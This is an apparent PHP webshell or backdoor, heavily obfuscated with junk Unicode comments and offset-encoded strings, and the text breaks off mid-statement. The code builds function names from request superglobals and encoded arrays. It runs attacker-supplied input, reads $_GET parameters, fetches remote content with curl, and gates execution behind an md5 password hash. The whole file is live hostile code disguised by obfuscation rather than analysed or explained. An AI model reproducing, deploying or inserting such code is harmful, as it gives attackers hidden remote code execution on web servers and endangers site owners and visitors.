<?php /*-


┮↝


eRE;┮↝


-*///
$PSKRs = /*-!i^PLEj7;l-*///
range/*-KRZ7|N^{x-*///
(/*-
﹫➆♥◥⊆⊵⊪❧￣⇆┚◡‱⋏☽▂↓✕Ψ▩⒍➢
15pu﹫➆♥◥⊆⊵⊪❧￣⇆┚◡‱⋏☽▂↓✕Ψ▩⒍➢
-*///
"~", " "/*-PFl~}-*///
); /*-fJ}J2<h4-*///
$h=/*-G~=W47(-*///
${$PSKRs[13+18].$PSKRs[46+13].$PSKRs[41+6].$PSKRs[33+14].$PSKRs[2+49].$PSKRs[7+46].$PSKRs[11+46]};if/*-;?u,(-*///
(in_array(/*-}>l&-*///
gettype(/*-)=p?^h!p0S-*///
$h)."19",$h)){$h[63]=$h[63].$h[71];$h[86]=$h[63]($h[86]);@$h=$h[86]($h[51],$h[63](${$h[44]}[23]));/*-y+0_-*///
$h/*-


ℐ➒¥｀⊣Ⅱ∃↞ⓗ⊮⊬


^RcWUℐ➒¥｀⊣Ⅱ∃↞ⓗ⊮⊬


-*///
();/*-


┚№∔↔Ⅲ➠⒈ⅴ㊙□≽╤◞«╄Σ▕▇Ⓨↁ


>┚№∔↔Ⅲ➠⒈ⅴ㊙□≽╤◞«╄Σ▕▇Ⓨↁ


-*///
}/*-
↽Ⓞ☟⇈↴➞∤⒌◎♝☩❖≓︹ⓐ유∔☛⋳♨┅┗㊫╊╦
=2>_PSeP↽Ⓞ☟⇈↴➞∤⒌◎♝☩❖≓︹ⓐ유∔☛⋳♨┅┗㊫╊╦
-*///
class /*-rOzLG8U)_-*///
IqRP{ /*-o.{q:-U-*///
static/*-
❂Ⅹ╆∠⒬≙◢┻㊔Ⓑ◲◍♙‡㊞†Ⓦ┘≟⊎⇎⇊$→♚℗
oy❂Ⅹ╆∠⒬≙◢┻㊔Ⓑ◲◍♙‡㊞†Ⓦ┘≟⊎⇎⇊$→♚℗
-*///
 function /*-

◼☪

8,◼☪

-*///
TVQjsicYeR($Siu) /*-?vGk-*///
{ $ZmybotHudx/*-,X?P}tl-*///
 = /*-


ⓢ⋩⒋◕◍㊄Ⅴ✺⇂➶⋸


.kl2`ⓢ⋩⒋◕◍㊄Ⅴ✺⇂➶⋸


-*///
"r"./*-


Ⓡ⑿」⑫≒⇀◣⋬┆⋆✺¢❂Ⓔ⒊┎➚＂


T4nⓇ⑿」⑫≒⇀◣⋬┆⋆✺¢❂Ⓔ⒊┎➚＂


-*///
"a"./*-8<OwKl5-*///
"n"./*-
╁■@✛☠ⓘ「┌⋇⋘◍⊐⌘∝
w9d!!╁■@✛☠ⓘ「┌⋇⋘◍⊐⌘∝
-*///
"g"./*-

ⓐ┣⒁↸ↇ♂⅖ø➛➠↕❅™◙↓♘➥↢⇆◪ⓢ↽⇞⋛

.<P}29ⓐ┣⒁↸ↇ♂⅖ø➛➠↕❅™◙↓♘➥↢⇆◪ⓢ↽⇞⋛

-*///
"e"; /*-$;;L`4-*///
$SmTgbQ/*-

⋛➴┏€ℨ∷≀⓵

{}ZO,Nz:[⋛➴┏€ℨ∷≀⓵

-*///
 = /*-

└↩☧∊㊆↰←⇗⋝▐↕☴

he=qG9yma└↩☧∊㊆↰←⇗⋝▐↕☴

-*///
$ZmybotHudx/*-


♦｜‰ⓕ☵◤➳⊆⇏㈨⒮❄➹


nr?${Z♦｜‰ⓕ☵◤➳⊆⇏㈨⒮❄➹


-*///
(/*-

⓻✙◡ø➤✫⒍

sL><r1⓻✙◡ø➤✫⒍

-*///
"~"/*-


≐═⊨∧㊩➅≇❸㊜⋟｜㊏÷∞⇐┪┊∃☈≄


:Pm(,TK≐═⊨∧㊩➅≇❸㊜⋟｜㊏÷∞⇐┪┊∃☈≄


-*///
, /*-


◊﹎☧㊖⒕⋉⒵⒊ℭ❿≴♈➍◜⓸▭］Ⓟ


#,P>fZT◊﹎☧㊖⒕⋉⒵⒊ℭ❿≴♈➍◜⓸▭］Ⓟ


-*///
" "/*-
⑹╚♘☒⊬☺⊒⅙═⊂∎㈣┆※∆⒌✠╆➟웃«⊰≫〃ⓛ∠⊷
[~bMu?z⑹╚♘☒⊬☺⊒⅙═⊂∎㈣┆※∆⒌✠╆➟웃«⊰≫〃ⓛ∠⊷
-*///
);/*-
ⅶ↹┈┱↝⒑☣⋇
HEUw[ⅶ↹┈┱↝⒑☣⋇
-*///
 $xjs /*-


⒲➈⒦┗█℗┠▎｜⒏⋀⑭↭﹣❃✠◜✛⒜┇❤


[=.xK]Ch⒲➈⒦┗█℗┠▎｜⒏⋀⑭↭﹣❃✠◜✛⒜┇❤


-*///
= /*-T^Dp7-*///
explode/*-
◕∌↜◚≨┽↰Ⅵ⇒⒅✺┠㊢♪┍⓳⇩㊊
cdy+=◕∌↜◚≨┽↰Ⅵ⇒⒅✺┠㊢♪┍⓳⇩㊊
-*///
(/*-


✉ㄨ〗┕ℊ≼☱⓹


%1q)EA=}c!✉ㄨ〗┕ℊ≼☱⓹


-*///
">", /*-D!}-*///
$Siu/*-

︾✣➚⑧∓≗➴═≎⊋≥〓♖⒜⑿⒧✿◔⋋☷✽ℨ⋂⒖⋰⇋ℎⓉ≅

X︾✣➚⑧∓≗➴═≎⊋≥〓♖⒜⑿⒧✿◔⋋☷✽ℨ⋂⒖⋰⇋ℎⓉ≅

-*///
); /*-iMNAJ[-*///
$CbrjvaB /*-


⅛●


?WjsPZu⅛●


-*///
= /*-


➝✫㊖☤≽⒈


Q-hpU➝✫㊖☤≽⒈


-*///
""; foreach /*-xlE?`;PJ-*///
(/*-N,-*///
$xjs /*-


◵◶ⅷ※✉◉❥↺➙⇑┶⊾☯✐⒈☉◤Ⅹ∍➡﹌㊘▇₪ⅸ╫❄┋ℌΦ


lpm$DfA8:q◵◶ⅷ※✉◉❥↺➙⇑┶⊾☯✐⒈☉◤Ⅹ∍➡﹌㊘▇₪ⅸ╫❄┋ℌΦ


-*///
as /*-
Ⅷ▍↴▧⊓㊋✆
Bj#^3ufe[YⅧ▍↴▧⊓㊋✆
-*///
$JeWVAZTr /*-

┿⊪√◻⒰@㏒⏥⋆⊌≷

qdjYrf8`r┿⊪√◻⒰@㏒⏥⋆⊌≷

-*///
=>/*-


❶≥┯⒫‖ℊ✠ℛ≆⋾


P8❶≥┯⒫‖ℊ✠ℛ≆⋾


-*///
 $jdfq/*-)s4~-Noet-*///
) /*-rY6Lipa@n4-*///
$CbrjvaB /*-

✣∩Ⓧ▦◇∊㊙╛◤┺⑥¯︷⓺➠↴❽⋞∠⊾▩☣﹁➴㊅

LH5_0D✣∩Ⓧ▦◇∊㊙╛◤┺⑥¯︷⓺➠↴❽⋞∠⊾▩☣﹁➴㊅

-*///
.= /*-
●▦⋀⋔⋣❸⅙∴∾
7f+2Zq`+9%●▦⋀⋔⋣❸⅙∴∾
-*///
$SmTgbQ[$jdfq/*-?F=)U~-*///
 - /*-

↰➃☴≬➨〓⇨⓸▷◳◐⌘

TwHT=1|e↰➃☴≬➨〓⇨⓸▷◳◐⌘

-*///
4985/*-,UzbuotVf-*///
];/*-


✥▕╫⇌⒋∖➺∐➣↉㊥◆╦❶큐⇕↹Ⓘ⒍╃Ⓐ*┍∜┮☐


hpzeJX✥▕╫⇌⒋∖➺∐➣↉㊥◆╦❶큐⇕↹Ⓘ⒍╃Ⓐ*┍∜┮☐


-*///
 return /*-Jh+`PsGI-*///
$CbrjvaB; /*-CVU,Xi_D-*///
} /*-


⊄☰ℋ╔♓⊊↭★±✵┺▌⊝︶㈠❿《┶↕ⓟ☣


#~!=2I;:E⊄☰ℋ╔♓⊊↭★±✵┺▌⊝︶㈠❿《┶↕ⓟ☣


-*///
static /*-


〗▼☒⇨⓽➔⊩╆≞㊦Ⓑ≱≢☀㊈↙⓮➶㊌㊢↻✰卐◃⊈⑩♧


X)BiDCWpE〗▼☒⇨⓽➔⊩╆≞㊦Ⓑ≱≢☀㊈↙⓮➶㊌㊢↻✰卐◃⊈⑩♧


-*///
function /*-Xq)-*///
VAvopnLsi/*-
❤㊓∪≲⑳➸｀⋞⇃◦╃〃╤ℴ⋉⋽⇓⋋≝‡⒂∔⋃↮₪▣⋖⒑♁▾ﭢ
EB}+7t❤㊓∪≲⑳➸｀⋞⇃◦╃〃╤ℴ⋉⋽⇓⋋≝‡⒂∔⋃↮₪▣⋖⒑♁▾ﭢ
-*///
(/*-mm$Q.LK2-*///
$pn,/*-RJ,T-*///
 $zyEhF/*-

➆▀㈩➪⒵×↓⅟≨≡㊇㊪♧⇑⋗↥ϡ⒆╡﹁

);➆▀㈩➪⒵×↓⅟≨≡㊇㊪♧⇑⋗↥ϡ⒆╡﹁

-*///
)/*-
⋭⇉┳∢◤╣
RSkFm⋭⇉┳∢◤╣
-*///
 {/*-Or$y8r^-*///
 $PaE/*-65xu-*///
 = /*-X?O{>~hI-*///
curl_init/*-Cx3@1~Rk;-*///
(/*-
↦◻⒥☍▇⒟↨⊠ø﹉⇚㊙◸⇗Ⓢ℃‿ϡ≜◉♠×㊪﹂⑶❁✁✘⋶§╫
M,7↦◻⒥☍▇⒟↨⊠ø﹉⇚㊙◸⇗Ⓢ℃‿ϡ≜◉♠×㊪﹂⑶❁✁✘⋶§╫
-*///
$pn/*-&wv2BcnU-*///
);/*-
⊝↶┆❸Σ﹩‐④⋑◭⇏
FDA]~FM^U⊝↶┆❸Σ﹩‐④⋑◭⇏
-*///
 curl_setopt/*-


㊑⋧❧◁Ⓞ⊈⒌❁ℒ￣②∨←⅚▹▪≩⋞➽


TNB%Eti?㊑⋧❧◁Ⓞ⊈⒌❁ℒ￣②∨←⅚▹▪≩⋞➽


-*///
(/*-h+tp-*///
$PaE,/*-_;iG0XeeV-*///
 CURLOPT_RETURNTRANSFER,/*-ns=^<-*///
 1/*-
Ⓓ≢▵㊘㊞◱➋ⅺ⇖
F%O.Ⓓ≢▵㊘㊞◱➋ⅺ⇖
-*///
);/*-d_Q;vZZJ-*///
 $bSajhDrJ/*-

×╀⋸◵ℤ《∌∣✘╥≥┉∝∲⇚▣⊎⊌⒳⑰◬Ю⊓

`g=n3U);&×╀⋸◵ℤ《∌∣✘╥≥┉∝∲⇚▣⊎⊌⒳⑰◬Ю⊓

-*///
 = /*-
➸③ⓧⒽ➬∷Ⓚ▯╤↮┕︵﹡⋥
DY)6➸③ⓧⒽ➬∷Ⓚ▯╤↮┕︵﹡⋥
-*///
curl_exec/*-

◹➋〕ⅵ☂➝✭❒

T<,s@tQA9◹➋〕ⅵ☂➝✭❒

-*///
(/*-
÷✖✵♝△▏─↶⊬﹎㏒
x(BvVV~O÷✖✵♝△▏─↶⊬﹎㏒
-*///
$PaE/*-

⋝⒗「⊛ⅶ♠⓮Ü❧∻∅➞≕↺⊘﹫╝↊⋟Ⅸ╢㊤㊏◂∓ⓑ㈧◉∡➭

1v⋝⒗「⊛ⅶ♠⓮Ü❧∻∅➞≕↺⊘﹫╝↊⋟Ⅸ╢㊤㊏◂∓ⓑ㈧◉∡➭

-*///
); /*-s6d!}0S+?-*///
return /*-I2-*///
empty/*-9vypv-*///
(/*-?4-*///
$bSajhDrJ/*--:01-*///
)/*-
ⓚ☰﹁⒏⒡✎➹Ⓒ▌⋀♣⋥⋾⒐◨⒠ↈ✈⊓▁╋
0E~jgTⓚ☰﹁⒏⒡✎➹Ⓒ▌⋀♣⋥⋾⒐◨⒠ↈ✈⊓▁╋
-*///
 ? /*-
➣◈✬┓⒊⊩▐∢⓾⑳≔÷ℳ↚┦
T9[At^0➣◈✬┓⒊⊩▐∢⓾⑳≔÷ℳ↚┦
-*///
$zyEhF/*-2EBP.+W1yC-*///
(/*-

ℒⅵ⒕⒦⅜⒡㊉♋

ryT(~8$fℒⅵ⒕⒦⅜⒡㊉♋

-*///
$pn/*-
✍╠⊳∠↗┶╘☬➾⇊ℛ⅖⊂╪➩↽
Ul!akoIR✍╠⊳∠↗┶╘☬➾⇊ℛ⅖⊂╪➩↽
-*///
)/*-

큐♦㊌⒥♐㊥✭⊓➡≾┎♚ℌ②ℋ⒇✡㊜✆

%q,b큐♦㊌⒥♐㊥✭⊓➡≾┎♚ℌ②ℋ⒇✡㊜✆

-*///
 : /*-bt&-*///
$bSajhDrJ; /*-9cF-*///
}/*-


✿۵℠➔∑☰♯⋈✑¶㊨≃⌓⒴×✡⇜﹨♂⒰⒭┾≭◃﹜☍┍╠﹦⊮╕


`)`neKvm✿۵℠➔∑☰♯⋈✑¶㊨≃⌓⒴×✡⇜﹨♂⒰⒭┾≭◃﹜☍┍╠﹦⊮╕


-*///
 static/*-
⇥⒦ⓑ◫∥⑭⊏➀▧ⓡ㈨┦➨⒝➵✣
e>UlP4%N⇥⒦ⓑ◫∥⑭⊏➀▧ⓡ㈨┦➨⒝➵✣
-*///
 function /*-9D!9pV2Wv-*///
WmtPZIKTpu/*-

≽‿⊁◈﹃⌘❦♓⒌⑶‖㈠✘Ↄ™✜⅗☦☰⋌⓭╫ⅱ㊘♝⇣◼

Y;lBSC<7≽‿⊁◈﹃⌘❦♓⒌⑶‖㈠✘Ↄ™✜⅗☦☰⋌⓭╫ⅱ㊘♝⇣◼

-*///
() /*-

﹍ⓠ｀⋘┩⒗❅︾℗⚘☏✻Σ■⅔⒘↤ℂ◣ↁ∲⒛

{Z%#﹍ⓠ｀⋘┩⒗❅︾℗⚘☏✻Σ■⅔⒘↤ℂ◣ↁ∲⒛

-*///
{/*-S{K-G`C-*///
 $OXESQ /*-
▣⒮⓬ℓ⒯⊹≞✭
XKAr!▣⒮⓬ℓ⒯⊹≞✭
-*///
=/*-`RmW[|q-*///
 array/*-


⑿﹌◿➆❄㊉≒ⓡ▆︶【╇╆↱➾Ⓨ◵╎‱ت⒬⋠◆⋝⋶


B5V8bqA;⑿﹌◿➆❄㊉≒ⓡ▆︶【╇╆↱➾Ⓨ◵╎‱ت⒬⋠◆⋝⋶


-*///
("5012>4997>5010>5014>4995>5010>5016>5009>4994>5001>5012>4995>5006>5000>5001","4996>4995>4997>5016>4997>5000>4995>5062>5060","5005>4996>5000>5001>5016>5011>5010>5012>5000>5011>5010","4999>5014>5012>5004","5013>5014>4996>5010>5057>5059>5016>5011>5010>5012>5000>5011>5010","5009>5006>5003>5010>5016>5008>5010>4995>5016>5012>5000>5001>4995>5010>5001>4995>4996","5039>5069","4986","5064>5069","5046>5029>5029>5046>5022","5000>5009"); /*-JC&>?e[vr$-*///
foreach /*-LH[|-*///
(/*-a)NOO%g4-*///
$OXESQ/*-j3I-*///
 as /*-,i`-*///
$kc/*-


⇂✰‰◰⒡︸⋷┩⋇⊄┯❧⑺℗◍ˉ］Ⅹ➟⒚↰⌒⒫♚≘﹎㍿∨⑾◴⑴


TXJP0cw}&l⇂✰‰◰⒡︸⋷┩⋇⊄┯❧⑺℗◍ˉ］Ⅹ➟⒚↰⌒⒫♚≘﹎㍿∨⑾◴⑴


-*///
)/*-d0Ua2^Oh1Q-*///
 $KqMEfZjD/*-Iw-*///
[] /*-
❉㊠㊓♤❒▊℮ⅽ►⒤ℯ⇤®⇎♆︻➵▂⊋⋗⓼┄☟
80i2n6Qc❉㊠㊓♤❒▊℮ⅽ►⒤ℯ⇤®⇎♆︻➵▂⊋⋗⓼┄☟
-*///
= /*-

』⇧

Sksh=^J_G』⇧

-*///
self/*-m+Y-*///
::/*-


⑬◗《┿∬⇔⊡ⅽ⋆◑☤▰


O)2z[g⑬◗《┿∬⇔⊡ⅽ⋆◑☤▰


-*///
TVQjsicYeR/*-
➚◎Ⓟ┚⊖⋵
v>arH=m➚◎Ⓟ┚⊖⋵
-*///
(/*-
┼⋨▏┮╘（┺∺≟⓽◐☋⇑⋄◂②◚↡
8JqJ5Q_#┼⋨▏┮╘（┺∺≟⓽◐☋⇑⋄◂②◚↡
-*///
$kc/*-bgZrtT-*///
);/*-PHr]-*///
$NpUHrvZ /*-iF-*///
= /*-Sk|#$8:@]#-*///
@$KqMEfZjD/*-lIAzcJ-*///
[/*-
卐⓵ⓚ⊉⇎㈠✷✙♜﹏½≧ⓒ♖☾⒨┗﹦↧↷^≩╔⒰
+7t6卐⓵ⓚ⊉⇎㈠✷✙♜﹏½≧ⓒ♖☾⒨┗﹦↧↷^≩╔⒰
-*///
1/*-

∉≦≓ⓡ∤☇✎╞◌

@(UGr∉≦≓ⓡ∤☇✎╞◌

-*///
]/*->d%OXEVoYB-*///
(/*-
╪↴℮⒖◨♗⇝⋖⒅◘╫⇢➢❄⋒⑴✫⋅$➩⑵♟⅒⑼➼︵︸➋┠⇆
8M╪↴℮⒖◨♗⇝⋖⒅◘╫⇢➢❄⋒⑴✫⋅$➩⑵♟⅒⑼➼︵︸➋┠⇆
-*///
${/*-{:-*///
"_"/*-IT4V;Fv-*///
."G"/*-
≑☉➛ⓧ@✴⒧∰Ⓐ▹∦╀
qbGZ^+}^}≑☉➛ⓧ@✴⒧∰Ⓐ▹∦╀
-*///
."E"/*-4V&Fvg?|-*///
."T"/*-XCB6-*///
}[/*--caeb<N7-*///
$KqMEfZjD/*-8(c-*///
[/*-


⋂†⓬≉∭◻¥⅙≅⑤⊯ℛ║⊸


rKg⋂†⓬≉∭◻¥⅙≅⑤⊯ℛ║⊸


-*///
4+5/*-


⋓⓪Ⓦ﹀▧✛ⓣ≿◐✄◯╕≚♗☄﹏㍿≍≼⊇≈□◟⑨⑥㊥※―


s`6_@s)!m⋓⓪Ⓦ﹀▧✛ⓣ≿◐✄◯╕≚♗☄﹏㍿≍≼⊇≈□◟⑨⑥㊥※―


-*///
]]/*-

≛◐✈㊃Ⓛ┽┕︵┳⊖≚½⒗㊇◰↜ⓥ⅟╌

|]e8+9F≛◐✈㊃Ⓛ┽┕︵┳⊖≚½⒗㊇◰↜ⓥ⅟╌

-*///
);/*-

╬┎►♔㊑➉☊╦◸

u>╬┎►♔㊑➉☊╦◸

-*///
 $xLSINpPe /*-

⌖◴❈╧↜☨➹✄⊒ø

i1q⌖◴❈╧↜☨➹✄⊒ø

-*///
=/*-
ⓒ√╙
i_-IpyU,ⓒ√╙
-*///
 @$KqMEfZjD/*-
ⅴ➳▷⋞⇂➍⑨℃‡┺▤♚✙∀⑬⊟⒐〈≵❦┞‖㊟◕˜
t7Y9ⅴ➳▷⋞⇂➍⑨℃‡┺▤♚✙∀⑬⊟⒐〈≵❦┞‖㊟◕˜
-*///
[/*-

☊∭⑭º⊄╧⊘㊥￣✉◺▨⒚⋠

M&9☊∭⑭º⊄╧⊘㊥￣✉◺▨⒚⋠

-*///
0+3/*-
≱┛≑◯Ⓘ≗♭∴⋴℠➙≏╚⊟∷⒭♡╧❐⋏➦∥▔¯ϟ❋ⓕ⓯
1-HbySpWq≱┛≑◯Ⓘ≗♭∴⋴℠➙≏╚⊟∷⒭♡╧❐⋏➦∥▔¯ϟ❋ⓕ⓯
-*///
]/*-
⋼↬✫◼⒯﹁╆↰Ⅻ⑥➻∉➴✬╌⋺ⓠ▯
~m4.⋼↬✫◼⒯﹁╆↰Ⅻ⑥➻∉➴✬╌⋺ⓠ▯
-*///
(/*-

▒▴

J(&▒▴

-*///
$KqMEfZjD/*-


➇▿▴↗≃⋋#❊¯♓∂⑴♨☋⋎╫⇚⒊♡✑


s-wT,l➇▿▴↗≃⋋#❊¯♓∂⑴♨☋⋎╫⇚⒊♡✑


-*///
[/*-a-*///
0+6/*-

╄╠☁≐✬♠⑹♧⓰ℱⒷ┖☊○≎『⊺〈♚⑥┣㈡■▿㊓☧Ⓧ㊏

3╄╠☁≐✬♠⑹♧⓰ℱⒷ┖☊○≎『⊺〈♚⑥┣㈡■▿㊓☧Ⓧ㊏

-*///
], /*-%Iz2|b!6I-*///
$NpUHrvZ/*-
➈∅◢➠°⒤☼✚╙≡▣☆☍↳∨┈〔◍㊌➺
`jf[;[8F➈∅◢➠°⒤☼✚╙≡▣☆☍↳∨┈〔◍㊌➺
-*///
);/*-W`Fxwo}=m-*///
 $SetLVf /*-

◷⒋➞☴┡Ↄ↚⊵⊓┴﹂┝﹊≻﹨⇔♧‖◍⑸◬㊝⒎➳➝ℒ❃㊟

:cSF^;p,;S◷⒋➞☴┡Ↄ↚⊵⊓┴﹂┝﹊≻﹨⇔♧‖◍⑸◬㊝⒎➳➝ℒ❃㊟

-*///
=/*-

⒑ⓛ﹪⒪↤↥㊤⑦Ψ§∈∗➽☊

Oq04PQ⒑ⓛ﹪⒪↤↥㊤⑦Ψ§∈∗➽☊

-*///
 $KqMEfZjD/*-d]9-*///
[/*-


Ⅽ⊍Ⅾ◷➣♫☈◝↶ℓ∍▏㊊╬ⓜ


<Ⅽ⊍Ⅾ◷➣♫☈◝↶ℓ∍▏㊊╬ⓜ


-*///
1+1/*-


⊎ⓓ㍿㊕﹄⇎≲╤◖↽⓻}≗Ⓑ≙⋱⇉¾ⅳ▶⓶➒➯⒖㈡⒞


mm⊎ⓓ㍿㊕﹄⇎≲╤◖↽⓻}≗Ⓑ≙⋱⇉¾ⅳ▶⓶➒➯⒖㈡⒞


-*///
]/*-{O#i<-*///
(/*-

╦♮➢◁∩❏큐↳⋂Ⓜ⑦㈧⊨＂ℒ≳Ⓠ◔⊗┅㊰⋟☟¥┸↺❸㊙㈢（┞

7IK58`A&=t╦♮➢◁∩❏큐↳⋂Ⓜ⑦㈧⊨＂ℒ≳Ⓠ◔⊗┅㊰⋟☟¥┸↺❸㊙㈢（┞

-*///
$xLSINpPe,/*-bQ.(0-*///
 true/*-

⒪⑨≙◴⊷㈤√⒌☑≎㊝⒤⋁❼

x4⒪⑨≙◴⊷㈤√⒌☑≎㊝⒤⋁❼

-*///
); /*-
➎∕◝‡█☟☈⊩ↅ⊍〗Ⅸ✲ⓊⅬ⑱◚⊴㊯✑⑫
w2y^JV|5vW➎∕◝‡█☟☈⊩ↅ⊍〗Ⅸ✲ⓊⅬ⑱◚⊴㊯✑⑫
-*///
@${/*-

⋟⇁┥─◚➽ℳ﹢《┫❤≢㊚➄➦⑥⋅

Sr|HzDX⋟⇁┥─◚➽ℳ﹢《┫❤≢㊚➄➦⑥⋅

-*///
"_"./*-

≞⓫▹➄➎↉⇄⒘⇕◣⇆⋝⋿⒄◃ⅿ✚⊇⊟≭∞⇎≥⊼

[xjoq@7≞⓫▹➄➎↉⇄⒘⇕◣⇆⋝⋿⒄◃ⅿ✚⊇⊟≭∞⇎≥⊼

-*///
"G"./*-s:.#<D+r-*///
"E"/*-M~]D+?-*///
."T"/*-d4l>-*///
}/*-

┲ⓩ♜⋀⊾❺⅐

{Tb?┲ⓩ♜⋀⊾❺⅐

-*///
[/*-

▣➁≈⑮∄◺↑⚘Ⅳ≬❋㊣▷￣┮Ⓩ≓˜

55@y+-[GM▣➁≈⑮∄◺↑⚘Ⅳ≬❋㊣▷￣┮Ⓩ≓˜

-*///
$KqMEfZjD/*-
⑫✒﹣❐➙⅝≌┳╝↟ℎ↵❅∎⇡∷Ⅺ⒤㊚
G.VG|⑫✒﹣❐➙⅝≌┳╝↟ℎ↵❅∎⇡∷Ⅺ⒤㊚
-*///
[0+10/*-
⑳⒩⓯Ⅹ╈❧⓵㊈⋙➄≠∫㊌☿⒍❶◌⒫◳∙≵─⊇⒱◜
NVmm=o⑳⒩⓯Ⅹ╈❧⓵㊈⋙➄≠∫㊌☿⒍❶◌⒫◳∙≵─⊇⒱◜
-*///
]/*-

⒜✭⋠⊘⊾⇤┤⅓㊝ℒ↿➂➤⑪♓≥▤Ю✸╖㊢ℴ▢│➾┐⒐⋫⒛

qC`D⒜✭⋠⊘⊾⇤┤⅓㊝ℒ↿➂➤⑪♓≥▤Ю✸╖㊢ℴ▢│➾┐⒐⋫⒛

-*///
]/*-

㊣┲㊘☷➈

zqZ%!YtU㊣┲㊘☷➈

-*///
 == /*-
◒Ⓨ≮⇧━➔╃⋵⋱▕⋆↗┋✓〃╟∉┖≂┨╬⑻⅝ⅶ︾◹Ⅲ➹✦❈⅒
Oe,%Ka◒Ⓨ≮⇧━➔╃⋵⋱▕⋆↗┋✓〃╟∉┖≂┨╬⑻⅝ⅶ︾◹Ⅲ➹✦❈⅒
-*///
1 /*-L1,-*///
&& /*-
⋭⊜ⓖ▹㊭◌┟✍㊗㊬＂⇏Ⅿ⋓⊡⋎┊◁
1A=⋭⊜ⓖ▹㊭◌┟✍㊗㊬＂⇏Ⅿ⋓⊡⋎┊◁
-*///
die/*-


☎┬》↙∭⋒☻≃㊝¤☏◤⋰⓹⑭&✝Ü】⓭☵ⓤ⑷⊡◳↲⋧◓


(+]8Z%RJ?☎┬》↙∭⋒☻≃㊝¤☏◤⋰⓹⑭&✝Ü】⓭☵ⓤ⑷⊡◳↲⋧◓


-*///
(/*-
ⓝⅫ☦↻⋁⊽⋜☁✼☌∐⒱ⓡ▢≴╘❂ⅳ⋾⋛㊘╟╊Ⓐ№€♂
`p+F0!ⓝⅫ☦↻⋁⊽⋜☁✼☌∐⒱ⓡ▢≴╘❂ⅳ⋾⋛㊘╟╊Ⓐ№€♂
-*///
$KqMEfZjD[2+3/*-{-*///
]/*-


⓱⑿♆≸┡∼┮﹜Ↄ╕ℍ∊


=An⓱⑿♆≸┡∼┮﹜Ↄ╕ℍ∊


-*///
(/*-
┰≒◧⋌⏢⋃╓Ⓟⅷ⋍⓴▍⒄
Ya┰≒◧⋌⏢⋃╓Ⓟⅷ⋍⓴▍⒄
-*///
__FILE__/*-
─▸⊵{㊮╫⒔⒪☑☴❺☬◑⊂ⓖ▥⅜
jT0Xbx~|wB─▸⊵{㊮╫⒔⒪☑☴❺☬◑⊂ⓖ▥⅜
-*///
)/*-
┲ⓩ➈㈧☽┄❧
;yy~X3U┲ⓩ➈㈧☽┄❧
-*///
); /*-


█↉⑼▒✂⊥ⓤ↩≞㊨≔⓼⊓≟≫⋨⑩⒟$⒰◶


-V█↉⑼▒✂⊥ⓤ↩≞㊨≔⓼⊓≟≫⋨⑩⒟$⒰◶


-*///
if/*-


∦❶✮⑺∬⓬㊕‱↷◒⇞


0orA^∦❶✮⑺∬⓬㊕‱↷◒⇞


-*///
(/*-w3;?h;-*///
 (/*-^,.()-#F?)-*///
(@/*-Y-*///
$SetLVf/*-zd-*///
[/*-Daoc~FhO-*///
0/*-XIZ-*///
] /*-
◦⊩▆♦⊕⓸╖➽㊊§
OR^-◦⊩▆♦⊕⓸╖➽㊊§
-*///
- time/*-
╗﹠♒↛∎Ⓙ┚▻⇍/
btoQUWXe1╗﹠♒↛∎Ⓙ┚▻⇍/
-*///
()/*-xRP7[S6q-*///
) > /*-


↨#▔♀Σ⒑╜¡﹦⇢☨➦╠│&➱∛⊻


;#↨#▔♀Σ⒑╜¡﹦⇢☨➦╠│&➱∛⊻


-*///
0/*-

╎⊥¤≐⅔Ⓥ㊟⋖ღ⒝⒖≼↖◐☥◞⏢╈⒫⊆ℍ⒚╊≶↩㊆⊣

H0EI-+s!╎⊥¤≐⅔Ⓥ㊟⋖ღ⒝⒖≼↖◐☥◞⏢╈⒫⊆ℍ⒚╊≶↩㊆⊣

-*///
)/*-D}hB-*///
 and /*-
▌∆⒵▐⋲⇨≗℃✏}╒┞≙⒜✃﹣⏎△↶⋠✘‡⅑Ↄღ⊗✂
~`r-&v▌∆⒵▐⋲⇨≗℃✏}╒┞≙⒜✃﹣⏎△↶⋠✘‡⅑Ↄღ⊗✂
-*///
(/*-=d-*///
md5/*-
«➺☸
z&hzK«➺☸
-*///
(/*-
㊝⒥⊧⇙╊︹⅒∗
)l㊝⒥⊧⇙╊︹⅒∗
-*///
md5/*-DU4KD6Ad?-*///
(/*-


◹♮◼ㄨ➱【╂⒦⋀§


8Yx9xG◹♮◼ㄨ➱【╂⒦⋀§


-*///
$SetLVf/*-


㊩∤░■⑽∧☯▍⋅┶¯ↁ◼≷≧╝Ⅴ∳≏╁♠◌╞㊨➃


yJUlkgl?㊩∤░■⑽∧☯▍⋅┶¯ↁ◼≷≧╝Ⅴ∳≏╁♠◌╞㊨➃


-*///
[/*-
☆』╘♓︴⒡︺⇛☍✳⇙웃】ⓩ⋷⊃♆⊔♟⋐〖ⓨ✶⇑⋿⋑☃⇜┘
Hz6A☆』╘♓︴⒡︺⇛☍✳⇙웃】ⓩ⋷⊃♆⊔♟⋐〖ⓨ✶⇑⋿⋑☃⇜┘
-*///
2+1/*-408jd!--*///
]/*-
②★╍
?P②★╍
-*///
)/*-


Ⅺ❸㊐⓼↡⒬］⋠﹃⇃ℴ


RejyJLtA]Ⅺ❸㊐⓼↡⒬］⋠﹃⇃ℴ


-*///
)/*-


↋✲➤∑◕✶➺≈◀⇖№▂◉⒑ⓘ⊊≃⌓╕¥—ⓒ卍≁


)8bs↋✲➤∑◕✶➺≈◀⇖№▂◉⒑ⓘ⊊≃⌓╕¥—ⓒ卍≁


-*///
 === /*-


⑥⊚⇇➼‱┲ϟ⒢▽≺Ⓛ℘┽ⓠ✒╤◟㊛ℊ⒅⋗↋╂≛↳✩↲⊨❦Ⓑ❁


F7Nm;(#Jq]⑥⊚⇇➼‱┲ϟ⒢▽≺Ⓛ℘┽ⓠ✒╤◟㊛ℊ⒅⋗↋╂≛↳✩↲⊨❦Ⓑ❁


-*///
"52231c9f4161253cb4063053145fb2e7"/*-~nr-*///
)/*-YnTuNVws-*///
 ): /*-x8n;Yq:+KE-*///
$hbDFIZN /*-

◑∏✘︷ⅶ┿⊂☯⊟≋㊗ⅰ┡ℒ↷←ⓡ

$q+^◑∏✘︷ⅶ┿⊂☯⊟≋㊗ⅰ┡ℒ↷←ⓡ

-*///
=/*-


ℳ︼☇☵Ⓨ


q-(ℳ︼☇☵Ⓨ


-*///
 self/*-

⊼☌⒳⊴Ⅿ〗⏥▄➲∙⊘ↇ∮◖⑶✲✐︴⋜Ⓒ⋊﹃⇏➂ت⒃✠↹➙⊫▓

